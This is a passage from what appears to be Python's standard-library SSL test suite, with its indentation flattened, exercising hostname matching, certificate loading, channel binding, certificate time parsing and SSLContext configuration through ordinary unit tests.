# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # OpenSSL has a fixed limit on the password buffer;
            # PEM_BUFSIZE is generally set to 1kb. Pass a password
            # longer than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
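        # Shared helper: check the options that create_default_context() and
        # _create_stdlib_context() set, only checking flags whose value is
        # non-zero on this OpenSSL build.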
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
